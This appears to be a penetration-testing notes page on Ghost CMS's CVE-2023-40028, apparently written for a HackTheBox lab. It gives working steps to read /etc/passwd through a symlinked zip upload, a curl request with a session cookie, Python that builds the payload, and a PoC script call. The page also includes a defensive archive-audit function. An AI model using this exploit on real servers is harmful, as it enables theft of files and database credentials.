Ghost CMS

Open source content management system platform written in JavaScript (Node.js)

Enumeration
base URL for the Admin API
/ghost/api/admin
CVE-2023-40028 - Arbitrary File Read

Vulnerable versions: prior to 5.59.1

Authenticated users could upload a zip archive containing symbolic links. The links were extracted as links, so requesting the uploaded path returns the link target instead of the uploaded file, giving an arbitrary read of any file the Ghost process can access outside of content/ (for example /etc/passwd or the Ghost config containing database credentials).

Manual Exploit

Recreate the content/images/ layout Ghost expects inside the archive
mkdir -p exploit/content/images/
Create the symbolic link, pointing at the file to read
ln -s /etc/passwd exploit/content/images/test-file.png
-y stores the symbolic link itself instead of the contents of the file it points to (without it the zip would just contain a copy of /etc/passwd)
zip -r -y exploit.zip exploit/
Upload exploit.zip through the authenticated Admin API (the PoC script below automates the login and the upload), then request the symlinked path with the admin session cookie; the response body is the target file
curl -b 'ghost-admin-api-session=s%3AbWhDHjQNa5JeU809QF2JPW6e4UEss2Em.g6N0Kedu5O7xKtx8RF30BBpoEO1OMgdIJ%2BazK7H6nWY' http://linkvortex.htb/content/images/test-file.png
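The steps above build the payload on the command line. As an added example (not code from this page, from Ghost, or from the PoC linked below), the following Python builds the same symlink archive in memory, equivalent to `zip -r -y`, and also shows the server-side check that closes the hole: inspect each zip entry's Unix mode bits for the symlink type and reject traversal paths before extracting an upload. The entry name `exploit/content/images/test-file.png` and target `/etc/passwd` are taken from the manual steps; the function names are this example's own.

```python
"""Build a symlink-bearing zip (attacker side) and audit an uploaded zip for
symlink and path-traversal entries (defender side). Standard library only."""
import io
import posixpath
import stat
import zipfile


def build_payload_zip(files: dict[str, str], symlinks: dict[str, str]) -> bytes:
    """Create a zip in memory.

    files:    regular entries, name -> content
    symlinks: link entries, name -> link target (what `zip -y` stores)
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in files.items():
            zf.writestr(name, content)
        for name, target in symlinks.items():
            info = zipfile.ZipInfo(name)
            info.create_system = 3  # 3 = Unix: tells readers the mode bits are Unix st_mode
            # High 16 bits of external_attr carry st_mode; S_IFLNK marks a symlink (lrwxrwxrwx)
            info.external_attr = (stat.S_IFLNK | 0o777) << 16
            # For a symlink entry the stored data is the link target path, not file contents
            zf.writestr(info, target)
    return buf.getvalue()


def audit_archive(zip_bytes: bytes) -> list[str]:
    """Return findings for an uploaded archive; an empty list means it is safe
    to extract into the upload directory. This is the check Ghost lacked
    before 5.59.1: extracting the link as a link turns a later GET into a
    read of the link target."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            mode = info.external_attr >> 16
            if stat.S_ISLNK(mode):
                target = zf.read(info).decode(errors="replace")
                findings.append(f"symlink: {info.filename} -> {target}")
            # Reject absolute names and any name that climbs out of the extraction dir
            norm = posixpath.normpath(info.filename)
            if posixpath.isabs(info.filename) or norm.split("/")[0] == "..":
                findings.append(f"path escapes extraction dir: {info.filename}")
    return findings


if __name__ == "__main__":
    # Constructed sample: the same archive the manual steps above produce
    payload = build_payload_zip(
        files={},
        symlinks={"exploit/content/images/test-file.png": "/etc/passwd"},
    )
    for finding in audit_archive(payload):
        print("REJECT", finding)
```

A real upload handler should also refuse to follow links that already exist on disk (`os.lstat` before serving) and extract with `mkdir`/`open` rather than a library call that honours link entries; the audit above is the cheapest gate because it runs before anything touches the filesystem.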

POC

Link

Set the GHOST_URL value in the script to the target before running it

Read files with a valid Ghost account (the script authenticates with the supplied credentials, uploads the symlink archive and fetches the result)
./CVE-2023-40028.sh -u username -p password
